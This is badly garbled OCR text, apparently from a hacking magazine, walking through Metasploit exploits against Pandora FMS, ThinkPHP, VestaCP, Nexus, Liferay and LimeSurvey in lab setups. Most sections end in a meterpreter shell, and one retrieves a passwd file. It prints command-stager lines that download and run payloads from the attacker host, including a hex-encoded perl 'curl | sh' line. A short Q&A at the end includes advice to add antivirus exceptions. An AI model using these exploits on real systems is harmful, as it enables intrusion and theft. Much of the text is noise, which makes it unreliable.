tues Memes PSUS Seer) Cy Meee est PR tmtu ny meee Prt eN CT Ma eee ste ec ets ty PE tmtu yay Mote ely eT) Cs Me Ue sie Meer mecreistay Entry Mtr eee Steel) PT, A EL Sts CR CMOS SRE tog md_exet msf5 > use exploit/Linux/http/pandora_ping_cmd_exec Pisce atts sc Module options (exploit/Linux/http/pandora_ping_cmd_exec): cro es ae Mestre t a) oe) The password to authenticate with fete WSU ees iat ade Ror eit ross | eee Cr Cec CeO me CC ReOLeCCuistss Cement rer g eas cry yes The target port (TCP) ee oe SMCs ee ees es) Po ee Ue Ce cr Reece! oe el CC RS CUmaUne Lo a me Ue se me este CL) eo The listen address (an interface may be speci fied) merry eC ag et the required options as shown below.Prem tse rae se CPE) rhosts => 192.168.36.149 msf5 exploit( aC) res eet st Premises Pare erry eee cy Pecmeo crt Cas a RTCA 192.168.36.149:80 - The target appears to be vulnerable. prem ots tcG don er all the options are set, execute the module Tie m Coase eer Se eC Cae Re Seely Exploiting ... Using URL: http://0.0.0.0:8080/kafcjzmw Local IP: http: //192.168.36.128:8080/kafcjzmw Attempting to authenticate using (admin:pandora) meee Tiatm str) Ree eure ersO is Cums ct) eee sC wt CRC tC Sorta ee ae bereits atte cers Client 192.168.36.149 (Wget/1.14 (Linux-gnu)) requested /kafcjzMw ei COC CMC see meruoe uD) Sending stage (980808 bytes) to 192.168.36.149 Roe ee RCC et ee UMUC Os Pe ere Cee) Command Stager progress - 100.00% done (150/150 bytes) ne Pereyra aes cy Computer —: 192.168.36.149 rr CentOS 7.3.1611 (Linux 3.10.0-514.e17.x86_64) era ee) COC CEC ere ra eee Acute Praetorian) Server username: no-user @ pandorafms (ui , egid=48) meterpreter > Ve should successfully get a meterpreter session as shown in the above image. ThinkPHP Multiple PHP Injection Module ARGET: ThinkPHP <= 5.0.23 TYPE: Remc FIREWALL : Not Applicable hinkPHP is a popular PHP platform that enables users in the rapid development framework f web applications. The above mentioned versions of ThinkPHP are vulnerable to atleast tw .0 PHP injection vulnerabilities. This module exploits any of these vulnerabilities to grab a shell. At the time of writing, his vulnerability is still being exploited in the wild. Let us see how this exploit works. We hav- tested this module on the version 5.0.23 in vulhub. Vulhub is the collection of some of the uinerable software in docker containers. Let's set up the target.Wyre nen ar) Cc remote: Enumerating objects: 19, done. remote: Counting objects: 100% (19/19), done. remote: Compressing objects: 100% (17/17), done. remote: Total 9063 (deita 3), reused 10 (delta 1), pack-reused 9044 Receiving objects: 100% (9063/9063), 124.80 MiB | 1.47 MiB/s, done. Resolving deltas: 100% (3530/3530), done. Updating files: 100% (1287/1287), done. ee yisu eR ete eee ers we ree ee Ue eee tres nee MOU Ar ee ee EA erreur mar eye ete ean ed Coen ee een ac atsey erapeti Teena ms atte) eres Sees tae) eer ee CLE a me ataey esc eenestae) cere ite) eae tae) eytty Seema tse) CE ean tae) Protea ae teat) Pe ens atss) Cigiyosee eee eae) lLoad the thinkphp module as shown below Pere eo ey Pricer es ts Pm Tet ORS Im Co SCe net Aan u mae ord ee er Me ssc) eee i A proxy chain of format type:host:port[,typ Cae aais | eee oo ey ee a Omer esc BCs Ce CSR EO cmt e cag 8080 og The target port (TCP) Sa oy ORCS e ee Ce ee ee eee ee MA RCC ron tart core See yes eee ec Se rated no Negotiate SSL/TLS for outgoing connections Eaters ir Path to a custom SSL certificate (default i Reem et) TARGETURI / Sry eer sa cy The URI to use for this exploit (default is er) Pos no Dae eer e CTR SC mabey ree me PO eee retest sty ns The listen address (an interface may be specifi ed) mere) MCC cun adcoe mor ests Dea Uae CR Pe] cries wren ed pores tet a Ba eeCR et eee ne! Peewee itsts Sage) srvport => 8888 msf5 exploit( Prom Ura ae Us seU Bee Uris tcc Ree EMER tan Rag MIR ei meets ec Nea ee Ct eMC Ce CR Te Creer ie Diem Chae es ae Eye a) arm tc as 172.18.0.2:80 - The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulner able version. Pee tot don In executing the module, we successfully get a meterpreter PESTS Te DET Ty SO Rca Oe CR e yy OP eee ei Morr eet etc sC Lm crc mina ee ee icc ist any etre RMS ete ee Src Client 172.18.0.2 (curl/7.52.1) requested /SidDKm4BXHu Sending payload to 172.18.0.2 (curl/7.52.1) Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:43234) at 2020-06-01 13:51:16 -0400 See ae es ee Cues MS etre CR ect] DKm4BxHu; chmod +x /tmp/WxRhvxia; /tmp/WxRhvxia; rm -f /tmp/WxRhvxia Command Stager progress - 100.0% done (114/114 bytes) Ec Peeves ae rs) oT ee CECA Pe) ro Ste MCU eee een TD) era ee 9 CoC ee Meee ae Coc Aus Petrie eer oo) Server username: no-user @ b9966ca7cibf (uid=33, gid=33, euid=33, egid=33) meterpreter > Vesta CP RCE Oday Module ‘ARGET: Vesta CP TYPE: Remote FIREWALL : Not Applicable lestaCP is an open source website control panel which is very powerful. It is a control panel that has website, email, Domain Name server and database functionalities. Users can control ith a simple web-based interface. With VestaCP, users can install more than 439 apps with one click installer. It is popular due to its light weight, resource-friendliness and a simple installation procedure. Here we will install it a fresh Ubuntu Server 18.04module is an authenticated module which exploits a command injection vulnerability in -list-user-backups bash script file. Any user with low privileg S to grab a shell on the target. Now let's see how to install Vestacp on a new Ubuntu server. Login into the Ubuntu server and download the install script of Vesta Control Panel as sh ‘own bel hown belo} ind 15 minut he installation will finish as shown below. Note the username and password displayed. This ded to login int IP address may change depending on the network adapter we assign to the virtual machine. Since we have set NAT adapter] it takes IP address from it. Go to the IP address and login into the Vesta control panel. le have logged in as a admin user. However to test this module, we need a user with low pr ivileges. So let's create a new user as shown below. adminfter entering all the details, click on "Add” and the new user will be created. Log out as admi user and login as the newly created user. © > © ahaa | EAD zee . mt @cemminaiim. @ user2he target is set. Now cp_exec module. Pree Ce oat ents ees msf5 exploit( esc Module options (exploit/Linux/http/vestacp_exec): ord Cee ecu Met Mera ciety Leo oy ry The password to login with Posted ir Pons URC eS net cod Ons ypezhost:port][ ... ] oo rr The target host(s), range CIDR identifier ee me metre oe Cras pos) yes The target port (TCP) CO yes SCs ee eRe See UE ee RC ee meer Ls ery ee) ar ARC eRe UL ssi oad rr este eee oo mest) A pater no Path to a custom SSL certificate (default Pe Ne rc) TARGETURI / eee Oe uc Tso eee emetic ed peer) rea Moe Oe SU Nog Dat eet Tras MCR SCG UL am) Pe ser Meret sca) foe yes ALM O COU ee eas! options Parmele eee eet) SOT eC Cet) Pew oes ce Perms} eee Peewee Petey erty Pere ewe crys) Parmer esc TU Cee EL eer) irri Cree eer) Poems srvhost 192.168.36.128 Prerrt Ce eee ee Exploit completed, but no session was created. Se er cee Cree eee rg PMH es a emcee eC Cer e aeac ut rie ORCC ee ee CR MeeM iste PO eC Reet) rer) Paemratsts ) > [+] 192.168.36.150:21 - Successfully authe nticated to the FTP serviceis not failure. pare ) > [+] 192.168.36.150:21 - Successfully authe ste Roe acest ORCR CRU PR RCE ee OC EUR RCE RCO Cum mmr tee POMC UH esr eer Reem CUm IL [+] 192.168.36.150:8083 - Cookie and CSRF token values successfully retrieved ORC RCH ee ee eee en ume stir 192.168.36.150:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes. [+] 192.168.36.150:8083 - Scheduled backup has been started ! TORU RUT eee a CRESS Ct amas Ce ere eerste ORC RCE eer eC UR SCE eee aes Ce ere eerste POM eC ee CRUSE ot a ome ata ad ee eae t tt ee OMe RCT ee CURE ot Emm ot ae ad ae ee ae ett OM CH eee CRs Et em a ae ad Poe ae etts ee ORR RCH eee CRC e ot emma aay er 30 second. Zzzzzz... 192.168.36.150:8083 - It seems there is an active backup process ! Recheck aft Pee ere eee [+] 192.168.36.150:8083 - First stage is executed ! Sending 2nd stage of the paylo ad Sending stage (53755 bytes) to 192.168.36.150 [erase eu etree Cee ee ORC IeC Ed 2020-05-31 10:15:17 -0660 ORORGC RRC n eC Oo UR ea Re y the shells <3 192.168.36.150:8083 - This exploit may require manual cleanup of '/home/user2/ a’; $(perl${IFS}-e${IFS}' system(pack(qq,H114, ,qq,6375726c202d73534c20687474703a2F2 £3139322e3136382e33362e3132383a383038302f6c7a766C3954755135756b737a6371207¢207368, Oe Res 3 [1] 192.168.36.150:8083 - This exploit may require manual cleanup of '/usr/local/v Pees ee ees 8 OE msf5 exploit( erty Active sessions COOLS pC Stems Ca 1 pee Pree eet Te meer ee( -36.150:56766 (192.168.36.150) Nexus Repository Manager Injection RCE Module TARGET: Nexus <=3.21.1 TYPE: Remote FIREWALL : Not Applicable Nexus is a repository manager just like Maven, APT and Go. This module exploits a Java pression Language (EL) injection vulnerability in Nexus upto the above mentioned versions. his vulnerability allows attackers to execute some remote code on the target.[Let's test this exploit module. For this, we will install a docker version of the target. The target 's version is 3.21.1 hackercoolmagz@kali:~$ sudo docker run -d -p 8081:8081 —name nexus sonatype/nexus3:3 are erm Rie csi OCCU CMEC reer Mme Pere Nee ar sy te) Tamer etd Teer mest Carers eam esd Pest er een amen tig Presets der yet erc tea Ce eC t re eC sC La) ee MOT Mom reer ree’ 47€7478e79#336850722497 fdc8665776d3522770ae98a10b87d6710a0858b7 Once the docker is installed, we need to grab the administrator login password as shown. W- e will need this password to login Tisch ki CO Rea ee cn) See Ce ae ee ee eee | Once you have the password, open a browser and go to localhost port number 8081. Enter lusername and password when the login prompt pops up. The username is "admin", “prone tiet‘hoose a new (and simple) password for the admin user. (O) Welcone ianaeacensioaaes How can we help? oe F newer By >| Prease choose a password forthe admin user frre = une f Gees a pen FOF IFor the next prompt, click on "next" right away. (G eicons aeeaerneceereess Get Started How can we help? Ooo Car 7) configure Anonymous Aecess Repositor eee OD Welcome ssunsna: seers tent ae = epee eee ne ens ae sume ‘ot tated How can we help? ‘oS & Smeans Se Complete : Repostor Om? Sum? Vue EI Dens mon? OH! Arm GER rene? YU Yowhe target is set. Load the explo manager_el_injection SER one eee me estn) Pricer lest ) > show options Module options (exploit/Linux/http/nexus_repo_manager_el_injection): aes ae mast sta ee yes Reet Proxies rr eis SONS ict etd esata] Geom Cron wr The target host(s), range CIDR identifier, o Pere retCot Si e Tas cost na The target port (TCP) SRVHOST 0.0.0.0 yes Meee Ua mercy ee Se ee ee Re cre eRe Roe ee os cos eee) wr Ree Reo es ee false cd see e et Sue astl Eten no PTC mc ROMs tee ita) Nos cr Daa mot ars CCR SCRae ey ce me Ce st Me Mast iscL) rs SCOR CBC ew iste) C) Teme Ty Bimbo Un ad rita taee hci .C od CMCC tcl g. Tce Serres’ [Set thi option jown below. Peres PIT eta ee) Sree rete) peewee Pa Ci ey Peewee Pra ae Uo Ue eee Ae! Poem reste Pata Ue See Ca Pemer yest ees UAE MRC ee eC CM terre e Ce TIO emCsstus Poem lest don Have any questions? Fire them to [email protected]fter all the required options are set, execute the module as shown below. CCeST ICSI ea Se ROR Cm EU Ue errs Bes eee em Crete ee eer oC) ORR oe oe eee ee ee eer eMC CRT SCLn See ee ee Ome er ime mss) erireunteT corr ot) [+] Logged in with NXSESSIONID=a33e9892-804e-4e6a-bdb8-70920489891c; etre eM Teta Re ees [+] Successfully executed command: curl -so /tmp/mCUSmEdE http: //172.17.0.1: CE ploag Client 172.17.0.3 (curl/7.61.1) requested /@sAjH79QyJ0Zk Sure ict mete CRC Tae ee) US Oe a eS RCE EM iD) OR ee eee eo 4 Command Stager progress - 71.68% done (81/113 bytes) Ome Re ep yea Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46346) at 2020-06. 11:50:34 -0400 Ce OM aT eC RRC tem Ico) Ome ee ea esd Command Stager progress - 100.00% done (113/113 bytes) rece s Prigse iit Me ESOL (Ti EU ee) ry Red Hat Enterprise Linux 8 (Linux 5.4.0-kali3-amd64) Re eae) BuildTuple : x86_64-Linux-musl Persie ee ys Patsy tC) Server username: no-user @ 47e7d78e79f3 (uid=200, gid=200, euid=200, egid=200) meterpreter > f s you can see in the above image, we successfully have a meterpreter session Liferay Portal Java Unmarshalling RCE Module TARGET: Liferay < 6.2 6, 7.0.6 GAT GA4 7.2.1 GA2 TYPE: Remote Liferay is an open source enterprise portal which used to enable corporate extranet and intra ‘net. It's a web application written in Java and also offers other features like development of ebsites. The above mentioned versions suffer a RCE vulnerability in the JSONWS feature his vulnerability allows attackers to execute code as the liferay user. Let's test this exploit module. We tested this on Liferay portal version 7.2.0 GA1 version Install the docker version as shown below. Te Oe ee eae cr) CR Rr eC may cere remeron meee eer Rei coaele aye eae ey PO mec CEL) aafiaid2bb85: Downloading 57.01MB/66.87MB eee Red ee iret me sey eee ee Reiss Poteet Metta areaenough to set the target. L unmarshalling modul wn bi Creer ere ee emer) Pree Tests erst Module options (exploit/multi/http/Liferay_java_unmarshalling): ecu Me mess c st) Proxies oo mene ST ret ad eed crests or i eo a Ome ee SCs) PUSS Le ast Che te Pris 8080 rey The target port (TCP) SRVHOST 0.0.0.0 yes eee ec mercy er oe ee en eC Ce eR RR RRS eee roe Sea) yes Ce eee Ue SSL cate no Negotiate SSL/TLS for outgoing connections Eaters or Path to a custom SSL certificate (default is Ned) TARGETURI / yes ee) rid no aces ere Payload options (java/meterpreter/reverse_tcp) Musuem retost ist os The listen address (an interface may be specifie 4) mere) SUOmeC CUM ag Doctor cia Id Name Ce ao ee eee ee ee ee vd Beas ee | [Set all the required options as shown below and use check command to see if the target is indeed vulnerable. Poems ysts( set rhosts 172.17.0.2 rhosts = 172.17.0.2 Paces ests a iat eet ee Te ee Peewee eee) ree) msf5 exploit( set Uhost 172.17.0.1 Tae eC et msf5 exploit( ) > check [*] 172.17.0.2:8080 - The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify. Prem ata D>n After all the required options are set, execute the module as shown below.Pye Mo Cut At me meu ee) Se eo Re CR eu eer Beste ete aCe ee orem mT Tst)) The target appears to be vulnerable. Liferay 7.2.0 CE GAl MAY be a vulnerable ve PSC tremr stm Using URL: http: //172.17.0.1:8888/ et er ese eer est PU U ee Petree matic ee Pete el ae a rece td Sending stage (53904 bytes) to 172.17.0.2 Meterpreter session 1 opened (172.17.0.1:4444 > 172.17.0.2:48394) at 2020-06-01 Perey estan ty) Parco Petrie eer Uy Re UE SUL Pretest ae re) Bsa metry Pease eee rsd (corn ME Evert t) rr ete een eT) Peau! neterpreter > As you can see in the above image, we successfully have a meterpreter session. Limesurvey Dir Traversal Auxiliary Module imeSurvey is a free and open source online survey web app which is written in PHP and ba sed on a MySQL, SQLite, PostgreSQL or MSSQL database. It allows website users to creat surveys, collect responses, create statistics and export data to other apps The above mentioned versions of Lime survey have a directory traversal vulnerability (lo cal file inclusion) which allows attackers to download any arbitrary file from the target. Let's | ee how this module works. We tested this on Limesurvey version 4.1.11 hosted on the Xam- pp server installed on a Ubuntu 18 machine. Since this is a Linux machine, we will be downlo ading the "passwd" file. Let's set the target. Download a vulnerable version of Limesurvey from the link given ttps://github.com/LimeSurvey/LimeSurvey/releases. Extract the zip file (downloaded) and ‘opy the extracted directory to the root directory of the web server as shown below. POT er ery S$ mv_LimeSurvey-4.1.11-200316 Limesurvey ac ~4.1.11-200316 DT Sette rane iat MeL Ae ye od cp: cannot create directory '/opt/lampp/htdocs/limesurvey': Permission denied Tse See Mees Ga SB SA as Yn TS CE ae nee ee |hange the ownership of the limesurvey folder to the web user. $ sudo chown www-data:www-da Teaver TIE TAC La ee 5 esU triad eiastr arting ProFTPD — ee oo INow go the limesurvey installer (http://localhostlimesurvey). Click on “start installation” LimeSurvey installer Progress Welcome Language selection Seti, CFuimesurvey\ccept the license terms. eoce sos ° noe LimeSurvey installer Progress License : no LimeSurvey installer Progress Pre-installation check OTST AT ROTTSlext, populate the database. les ee LimeSurvey installer Progress Success! Administrator credentials, seen, CP cimesurvey no LimeSurvey installer Progress Database settings Database creation — Fay CGuimesurey lext, configure the administrator credentials. C[recrenreres ooee leat ° noe LimeSurvey installer Progress Administrator settings - Further settings for application administrator hms sts eee on noehe target is set. Now load the ai iary/scanner/htt rversals module. Ses eye ee (emo sketie7| ) > show options Module options (auxiliary/scanner/http/Limesurvey_zip traversals) Pr Current Setting Required Description eat 7 Ne Ce Unt eae) a) gis Ea) ry The file to retrieve eo eee) oe eu me | Proxies no A proxy chain of format type:host:port[ type:host:port][...] fre ry The target host(s), range CIOR identifi Teg CROC comet lod ite 80 yes SU wee le: an ae) SSL roles i) et eA Om surmise bns ar cai) ea aid em ea mur le lal ation cet ory a eee ae tee ara) Tease em is inaeta meets Ls Set the required optio ieeesnecing ee ee rr) rhosts => 192.168.36.148 (eRe s Reta eee LLG) (eC) eee saclay | eo eu) password => admin ec ils mae ay fees amas Clay (Meee ease let ema ee eC eR CR CR CCM art ie malt ca inseReSReC ia ee | I the required options are set, execute the module. reesei aT Ce Rote se OCR eC Mas Ge RC cas ma AC ep oc OSCELE Rees cya! ECC MOt ies Ce ae a emeC ecto) Auxiliary module execution completed insf5_auxiliary( he file has been successfully retrieved and stored in the metasploit loot directory. Let's viewester TST AUC AC epi BT Str Teen Sun tis Ea) eT Stay Cie eee ag fey Ses) Coty Ara Cee suite rt it r/mail ee usr/sbin, Cra yards 13:13:proxy: /bin:/usr/sbin ONE Pe CL HAL Ere eta Seed ta eae Ur eta Try ietses tes) var/1 Prater) SUA chy Suara! ist:/usr /nologin bin/nologin Reporting System (admin) bad his is the target system's "passwa" file. iintsaksenns TEAC Ieee SUC sl : Can we use Metasploit from Windows? Yes. There is a Windows version of Meta- ploit Framework which can be downloaded ind installed on any Windows machine. Note hat Metasploit Framework requires administr ative rights to be installed on the Windows s- ‘stem. If there is any antivirus installed on the indows system, it may generate alerts while [Metasploit is being installed or used. So don't forget to add proper exceptions first. Metaspl- it can be downloaded from the link given here. https:/www.metasploit, com/download : Who is currently running the Anonymo us group? Well, that was an excellent question. | will ell you this but you should not reveal it to an- one. Ok. Promise. Here | am revealing it The name anonymous itself means “not identified by name or nameless" and here yo- ure asking about the anonymous hacking gr -oup. Bro/Sis, all we know about the anonymo| -us is that it is an international hacking group which is decentralized. Decentralized means not having a central command. Although ther- are reports of some of this group members be -ing arrested, nobody exactly knows who they are Q : What is brute force attack in cyber sec- urity? How it will be prevented? A: Brute force attack is a password attack in which hackers try a number of passwords eac| -h second until they find the correct one. Nor- mally software called password crackers is us -ed to do this. Brute force attack is prevented by limiting the amount of times the user can try to login.